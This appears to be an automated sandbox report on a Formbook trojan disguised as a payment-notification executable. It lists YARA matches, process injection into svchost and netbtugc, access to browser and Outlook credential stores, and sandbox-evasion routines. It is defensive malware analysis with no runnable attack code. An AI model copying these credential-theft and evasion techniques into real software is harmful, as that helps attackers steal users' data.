Source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/7

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009A37B5 GetLastError,FormatMessageW,

0_2_009A37B5

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009910BF AdjustTokenPrivileges,CloseHandle,		0_2_009910BF
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009916C3

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009A51CD

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_009BA67C

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_009A648E

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_009342A2

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

File created: C:\Users\user~1\AppData\Local\Temp\intersentimental

Jump to behavior

Source: Payment Notification Confirmation 010_01_2025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000005.00000003.1640136409.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3760623624.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1642165259.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3760623624.0000000003519000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1643152969.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1643152969.0000000003519000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1642103245.00000000034F9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment Notification Confirmation 010_01_2025.exe	ReversingLabs: Detection: 71%
Source: Payment Notification Confirmation 010_01_2025.exe	Virustotal: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Payment Notification Confirmation 010_01_2025.exe

Static file information: File size 1578496 > 1048576

Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Payment Notification Confirmation 010_01_2025.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3759664586.000000000057E000.00000002.00000001.01000000.00000004.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3759427529.000000000057E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1303536619.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1305682299.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1308448145.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1367997688.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365953942.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1458066825.0000000003688000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1461037729.0000000003831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1303536619.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1305682299.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1308448145.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1367997688.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365953942.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3762610915.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1458066825.0000000003688000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1461037729.0000000003831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1457948459.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1426971457.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761144075.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.3760623624.000000000345E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.000000000400C000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1746896958.0000000011BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.3760623624.000000000345E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.000000000400C000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1746896958.0000000011BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1457948459.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1426971457.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761144075.0000000000878000.00000004.00000020.00020000.00000000.sdmp

Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment Notification Confirmation 010_01_2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009342DE

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00950A76 push ecx; ret	0_2_00950A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B48A9 push esp; ret	2_2_003B48AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CE2BA push 00000038h; iretd	2_2_003CE2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CA436 push ebx; iretd	2_2_003CA600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C8C92 pushad ; retf	2_2_003C8C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003CA5D9 push ebx; iretd	2_2_003CA600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C47A2 push es; iretd	2_2_003C47AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B3780 push eax; ret	2_2_003B3782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B17E5 push ebp; retf 003Fh	2_2_003B17E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A109AD push ecx; mov dword ptr [esp], ecx	5_2_03A109B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03252238 pushad ; iretd	5_2_03252239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03241126 push esp; ret	5_2_03241127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325D1B0 push es; ret	5_2_0325D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325101F push es; iretd	5_2_03251027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325550F pushad ; retf	5_2_03255510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325AB37 push 00000038h; iretd	5_2_0325AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0324FFA0 push esi; iretd	5_2_0324FFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03256E56 push ebx; iretd	5_2_03256E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03250EAB push ebp; retf	5_2_03250EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325FEF5 push FFFFFFBAh; ret	5_2_0325FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03256CB3 push ebx; iretd	5_2_03256E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_038203DA push ebx; ret	5_2_0382042C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382429A push cs; retf	5_2_038242F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03824268 push cs; retf	5_2_038242F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_038247F5 push es; ret	5_2_038247FA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382D620 push esi; ret	5_2_0382D63B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382344F push cs; ret	5_2_03823450
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03829DFF pushad ; retf	5_2_03829E00

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0094F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0094F98E
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_009C1C41

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98708

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	API/Special instruction interceptor: Address: 1316BE4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000002.1320155720.00000000012E6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXE!

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9820

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3964	Thread sleep count: 153 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3964	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3964	Thread sleep count: 9820 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3964	Thread sleep time: -19640000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe TID: 5128	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe TID: 5128	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe TID: 5128	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0096C2A2 FindFirstFileExW,	0_2_0096C2A2
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A68EE FindFirstFileW,FindClose,	0_2_009A68EE
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009A698F
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0099D076
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0099D3A9
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009A9642
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009A979D
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0099DBBE
